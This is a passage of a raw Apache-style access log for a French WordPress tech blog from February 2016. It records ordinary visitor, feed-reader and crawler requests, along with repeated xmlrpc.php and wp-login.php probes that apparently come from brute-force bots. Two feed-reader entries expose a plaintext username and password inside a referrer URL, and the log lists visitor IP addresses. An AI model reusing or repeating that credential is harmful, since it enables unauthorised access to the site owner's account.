-0800] \"GET /wp-content/uploads/2015/03/1-l57K-8uyN9ELuGbgcaItmw-1024x524.png HTTP/1.1\" 200 190496 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0\"\n86.246.217.7 - - [10/Feb/2016:08:52:51 -0800] \"GET /feed/ HTTP/1.1\" 304 219 \"-\" \"Mozilla/5.0 Vienna/3.0.9\"\n130.0.236.153 - - [10/Feb/2016:08:57:41 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n188.165.96.114 - - [10/Feb/2016:09:00:30 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 592 \"http://techmeup.co/paul-duan-le-super-heros-de-la-data-science-pour/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n109.15.143.216 - - [10/Feb/2016:09:01:24 -0800] \"GET /du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n109.15.143.216 - - [10/Feb/2016:09:01:37 -0800] \"GET /du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n157.55.39.72 - - [10/Feb/2016:09:05:25 -0800] \"GET / HTTP/1.1\" 200 7274 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n199.16.156.125 - - [10/Feb/2016:09:05:51 -0800] \"GET /post/88351742277/michael-ferranti-responsable-marketing-a-mailgun-nous HTTP/1.1\" 301 317 \"-\" \"Twitterbot/1.0\"\n62.210.142.23 - jez [10/Feb/2016:09:06:07 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://jez:lumn0h3D@techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n184.72.5.127 - - [10/Feb/2016:09:12:26 -0800] \"GET /rss HTTP/1.1\" 304 182 \"-\" \"Digg Feed Fetcher 1.0 (Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3)\"\n160.33.66.122 - - [10/Feb/2016:09:16:02 -0800] \"GET /wp-content/themes/great/images/facebook.png HTTP/1.1\" 304 188 \"-\" \"Mozilla/4.0 (compatible;)\"\n207.46.13.174 - - [10/Feb/2016:09:19:31 -0800] \"GET /sitemap-pt-post-2015-03.xml HTTP/1.1\" 200 1082 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n130.0.236.153 - - [10/Feb/2016:09:21:44 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n90.43.143.178 - - [10/Feb/2016:09:23:25 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 415 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\"\n90.43.143.178 - - [10/Feb/2016:09:23:25 -0800] \"GET /wp-content/themes/great/js/modernizr.min.js HTTP/1.1\" 200 6229 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\"\n90.43.143.178 - - [10/Feb/2016:09:23:25 -0800] \"GET /wp-includes/js/jquery/jquery.js?ver=1.11.1 HTTP/1.1\" 200 33586 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\"\n90.43.143.178 - - [10/Feb/2016:09:23:25 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/lib/js/widget-easy-twitter-feed-widget.js?ver=1.0 HTTP/1.1\" 200 663 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\"\n90.43.143.178 - - [10/Feb/2016:09:23:25 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\"\n90.43.143.178 - - [10/Feb/2016:09:23:25 -0800] \"GET /wp-content/uploads/2014/09/logo-transparent-horizontal-1024x482.png HTTP/1.1\" 200 334990 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\"\n90.43.143.178 - - [10/Feb/2016:09:23:27 -0800] \"GET /wordpress/wp-content/uploads/2015/02/favico.png HTTP/1.1\" 200 986 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36\"\n162.243.175.234 - - [10/Feb/2016:09:26:30 -0800] \"GET /feed/ HTTP/1.1\" 304 219 \"-\" \"NewsBlur Feed Fetcher - 4 subscribers - http://www.newsblur.com/site/5487666/techmeup-techmeup (Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3)\"\n54.93.47.160 - - [10/Feb/2016:09:29:07 -0800] \"GET /wp-login.php HTTP/1.1\" 200 1593 \"https://duckduckgo.com/html+alyaboom.com\" \"Mozilla/5.0 (Windows NT 6.1; rv:28.0) alyaboom.com/20100101 Firefox/28.0\"\n37.1.206.196 - - [10/Feb/2016:09:30:24 -0800] \"POST /wp-login.php HTTP/1.1\" 200 3779 \"http://MARRYME-BRIDAL.RU/wp-login.php\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36\"\n2.1.201.36 - - [10/Feb/2016:09:36:16 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n82.67.70.172 - - [10/Feb/2016:09:37:11 -0800] \"GET /wp-content/themes/great/js/customscript.js HTTP/1.1\" 200 3601 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0\"\n82.67.70.172 - - [10/Feb/2016:09:37:11 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2050 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0\"\n82.67.70.172 - - [10/Feb/2016:09:37:11 -0800] \"GET /wp-content/plugins/wp-shortcode/js/wp-shortcode.js?ver=4.1.1 HTTP/1.1\" 200 831 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0\"\n82.67.70.172 - - [10/Feb/2016:09:37:11 -0800] \"GET /wp-content/uploads/2015/02/tumblr_inline_njgqqazNyf1sa6hof-1-50x50.png HTTP/1.1\" 200 4836 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0\"\n82.67.70.172 - - [10/Feb/2016:09:37:12 -0800] \"GET /wp-content/themes/great/images/twitter.png HTTP/1.1\" 200 4482 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0\"\n82.67.70.172 - - [10/Feb/2016:09:37:13 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 503 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0\"\n130.0.236.153 - - [10/Feb/2016:09:40:40 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n62.210.250.66 - - [10/Feb/2016:09:46:18 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n198.58.103.102 - - [10/Feb/2016:09:46:57 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n62.210.250.66 - - [10/Feb/2016:09:50:14 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n62.210.250.66 - - [10/Feb/2016:09:53:21 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n90.56.182.137 - - [10/Feb/2016:09:55:17 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 416 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n90.56.182.137 - - [10/Feb/2016:09:55:17 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n90.56.182.137 - - [10/Feb/2016:09:55:17 -0800] \"GET /wp-includes/js/jquery/jquery.js?ver=1.11.1 HTTP/1.1\" 200 33586 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n90.56.182.137 - - [10/Feb/2016:09:55:17 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/lib/js/widget-easy-twitter-feed-widget.js?ver=1.0 HTTP/1.1\" 200 663 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n90.56.182.137 - - [10/Feb/2016:09:55:18 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n90.56.182.137 - - [10/Feb/2016:09:55:18 -0800] \"POST /wp-admin/admin-ajax.php HTTP/1.1\" 200 592 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n90.56.182.137 - - [10/Feb/2016:09:55:22 -0800] \"GET /wordpress/wp-content/uploads/2015/02/favico.png HTTP/1.1\" 200 986 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n207.46.13.174 - - [10/Feb/2016:09:58:25 -0800] \"GET /post/109303483553/marketing-pour-developpeurs-partie-3-le-site HTTP/1.1\" 301 364 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n130.0.236.153 - - [10/Feb/2016:10:01:35 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 456 \"-\" \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\"\n109.15.143.216 - - [10/Feb/2016:10:05:58 -0800] \"GET /apple-touch-icon-precomposed.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n109.15.143.216 - - [10/Feb/2016:10:06:10 -0800] \"GET /apple-touch-icon-precomposed.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n86.235.136.133 - - [10/Feb/2016:10:06:41 -0800] \"GET /wp-content/uploads/2015/02/10527525_10153205547817652_3810498128776234928_n-300x300.jpg HTTP/1.1\" 200 34314 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP06)\"\n86.235.136.133 - - [10/Feb/2016:10:06:51 -0800] \"GET /wp-content/uploads/2015/03/Screenshot-2015-03-13-20.20.39-1024x165.png HTTP/1.1\" 200 203835 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP06)\"\n198.58.103.28 - - [10/Feb/2016:10:08:10 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n157.55.39.245 - - [10/Feb/2016:10:19:19 -0800] \"GET /sitemap1.xml HTTP/1.1\" 404 4872 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n78.198.33.77 - - [10/Feb/2016:10:21:55 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 416 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n78.198.33.77 - - [10/Feb/2016:10:21:55 -0800] \"GET /wp-content/themes/great/js/modernizr.min.js HTTP/1.1\" 200 6229 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n78.198.33.77 - - [10/Feb/2016:10:21:55 -0800] \"GET /wp-content/plugins/wp-shortcode/js/wp-shortcode.js?ver=4.1.1 HTTP/1.1\" 200 831 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n78.198.33.77 - - [10/Feb/2016:10:21:55 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/disqus.js?ver=4.1.1 HTTP/1.1\" 200 1101 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n78.198.33.77 - - [10/Feb/2016:10:21:56 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n78.198.33.77 - - [10/Feb/2016:10:21:58 -0800] \"GET /wp-content/uploads/2014/07/tumblr_inline_n99vb998z21sygmpd-50x50.jpg HTTP/1.1\" 200 2503 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n78.198.33.77 - - [10/Feb/2016:10:22:00 -0800] \"GET /wordpress/wp-content/uploads/2015/02/favico.png HTTP/1.1\" 200 986 \"http://techmeup.co/trouver-un-job-tech-a-san-francisco-ou-dans-la/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n54.93.41.74 - - [10/Feb/2016:10:29:40 -0800] \"GET /wp-login.php HTTP/1.1\" 200 1593 \"https://duckduckgo.com/html+hnwatcher.com\" \"Mozilla/5.0 (Windows NT 6.0; rv:29.0) hnwatcher.com/20120101 Firefox/29.0\"\n216.218.147.195 - - [10/Feb/2016:10:35:13 -0800] \"GET /wp-content/uploads/2015/02/10527525_10153205547817652_3810498128776234928_n-300x300.jpg HTTP/1.1\" 200 34314 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.101 Safari/537.36\"\n216.218.147.195 - - [10/Feb/2016:10:35:13 -0800] \"GET /wp-content/uploads/2015/03/1-l57K-8uyN9ELuGbgcaItmw-1024x524.png HTTP/1.1\" 200 190496 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.101 Safari/537.36\"\n2.1.201.36 - - [10/Feb/2016:10:36:15 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n178.137.93.235 - - [10/Feb/2016:10:46:01 -0800] \"GET /steeve-morin-de-google-a-lentreprenariat/ HTTP/1.1\" 200 29433 \"http://autotop.com.ua/\" \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\"\n207.46.13.174 - - [10/Feb/2016:10:54:06 -0800] \"GET /wp-includes/js/jquery/jquery.js?ver=1.11.1 HTTP/1.1\" 200 33586 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n85.168.120.64 - - [10/Feb/2016:10:56:06 -0800] \"GET /apple-touch-icon-precomposed.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n85.168.120.64 - - [10/Feb/2016:10:56:07 -0800] \"GET /apple-touch-icon.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n85.168.120.64 - - [10/Feb/2016:10:56:17 -0800] \"GET / HTTP/1.1\" 200 7274 \"-\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1\"\n85.168.120.64 - - [10/Feb/2016:10:56:18 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n66.249.66.38 - - [10/Feb/2016:11:01:21 -0800] \"GET /rencontre-avec-nicolas-dessaigne-ceo-dalgolia/ HTTP/1.1\" 200 11529 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n88.178.170.165 - - [10/Feb/2016:11:03:14 -0800] \"GET /wp-content/themes/great/js/modernizr.min.js HTTP/1.1\" 200 6229 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0\"\n88.178.170.165 - - [10/Feb/2016:11:03:14 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/easy-twitter-feed-widget.css?ver=4.1.1 HTTP/1.1\" 200 505 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0\"\n88.178.170.165 - - [10/Feb/2016:11:03:14 -0800] \"GET /wp-includes/js/jquery/jquery.js?ver=1.11.1 HTTP/1.1\" 200 33586 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0\"\n88.178.170.165 - - [10/Feb/2016:11:03:14 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/lib/js/widget-easy-twitter-feed-widget.js?ver=1.0 HTTP/1.1\" 200 663 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0\"\n88.178.170.165 - - [10/Feb/2016:11:03:14 -0800] \"GET /wp-content/uploads/2014/12/tumblr_inline_nga5swbqRY1sygmpd-50x50.jpg HTTP/1.1\" 200 1983 \"http://techmeup.co/adrien-duermael-pixowl-et-lindustrie/\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0\"\n88.178.170.165 - - [10/Feb/2016:11:03:14 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0\"\n62.210.142.23 - jez [10/Feb/2016:11:06:07 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://jez:lumn0h3D@techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n92.222.20.166 - - [10/Feb/2016:11:11:57 -0800] \"GET /rss HTTP/1.1\" 304 163 \"-\" \"Tiny Tiny RSS/16.1 (c352248) (http://tt-rss.org/)\"\n180.76.15.26 - - [10/Feb/2016:11:19:52 -0800] \"GET / HTTP/1.1\" 200 33366 \"-\" \"Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)\"\n89.38.150.47 - - [10/Feb/2016:11:20:22 -0800] \"GET /wp-login.php?registration=disabled HTTP/1.1\" 200 1562 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/32.0\"\n54.166.27.248 - - [10/Feb/2016:11:30:34 -0800] \"GET / HTTP/1.1\" 200 33403 \"-\" \"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB6 (.NET CLR 3.5.30729)\"\n2.1.201.36 - - [10/Feb/2016:11:36:51 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n84.7.133.128 - - [10/Feb/2016:11:39:24 -0800] \"GET /les-geeks-vengeurs-masques-du-21e-siecle/ HTTP/1.1\" 200 9023 \"https://www.google.fr/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n84.7.133.128 - - [10/Feb/2016:11:39:26 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 868 \"http://techmeup.co/les-geeks-vengeurs-masques-du-21e-siecle/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n84.7.133.128 - - [10/Feb/2016:11:39:26 -0800] \"GET /wp-content/themes/great/js/customscript.js HTTP/1.1\" 200 3600 \"http://techmeup.co/les-geeks-vengeurs-masques-du-21e-siecle/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n84.7.133.128 - - [10/Feb/2016:11:39:26 -0800] \"GET /wp-content/plugins/wp-shortcode/js/wp-shortcode.js?ver=4.1.1 HTTP/1.1\" 200 831 \"http://techmeup.co/les-geeks-vengeurs-masques-du-21e-siecle/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n84.7.133.128 - - [10/Feb/2016:11:39:26 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/count.js?ver=4.1.1 HTTP/1.1\" 200 776 \"http://techmeup.co/les-geeks-vengeurs-masques-du-21e-siecle/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n84.7.133.128 - - [10/Feb/2016:11:39:27 -0800] \"GET /wp-content/themes/great/images/twitter.png HTTP/1.1\" 200 4482 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n84.7.133.128 - - [10/Feb/2016:11:39:28 -0800] \"GET /wp-content/themes/great/images/arrow.png HTTP/1.1\" 200 437 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n84.7.133.128 - - [10/Feb/2016:11:39:32 -0800] \"GET /les-geeks-vengeurs-masques-du-21e-siecle/?cf_action=sync_comments&post_id=21 HTTP/1.1\" 200 308 \"http://techmeup.co/les-geeks-vengeurs-masques-du-21e-siecle/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n162.243.175.24 - - [10/Feb/2016:11:41:05 -0800] \"GET /feed/ HTTP/1.1\" 304 182 \"-\" \"NewsBlur Feed Fetcher - 4 subscribers - http://www.newsblur.com/site/5487666/techmeup-techmeup (Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3)\"\n62.210.250.66 - - [10/Feb/2016:11:45:18 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n62.210.250.66 - - [10/Feb/2016:11:48:22 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n62.210.250.66 - - [10/Feb/2016:11:52:53 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n62.210.250.66 - - [10/Feb/2016:11:55:59 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n62.210.250.66 - - [10/Feb/2016:12:02:09 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n62.210.250.66 - - [10/Feb/2016:12:03:40 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 